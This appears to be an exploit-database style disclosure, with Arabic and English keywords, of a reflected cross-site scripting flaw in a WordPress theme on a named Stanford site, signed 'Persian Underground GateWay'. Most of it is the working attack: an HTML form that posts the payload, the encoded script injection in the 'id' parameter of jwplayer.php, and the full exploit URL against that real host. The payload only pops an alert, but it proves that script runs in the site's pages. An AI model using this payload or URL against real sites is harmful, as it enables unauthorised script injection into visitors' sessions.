Stanford Wordpress Template Cross Site Scripting Vulnerability

ثغرة exploit خطأ bug ووردبريس wordpress قالب template ستانفورد stanford اكس اس اس xss كروس سايت سكربتنج cross site scripting

******************

Exploit Title: Stanford Wordpress Template Cross Site Scripting Vulnerability

Exploit Author:  Sha4yan

Vendor Homepage : http://stvp.stanford.edu/

Google Dork: none

Date: 2016-01-01

Tested on: Ubuntu / Mozila Firefox

******************

Exploit Code:

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<form method="POST" 
action="http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E">
<input type="submit" value="Exploit@Sha4yan"/>
</form>
</body>
</html>

******************

Location & Vulnerable query:

http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=

Add This :
%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

******************

Proof:

Executable script tag in Stanford's own page:

Exploit : 
"><script>alert(/xss/)</script>

Exploit query:
http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

******************

Persian Underground GateWay

******************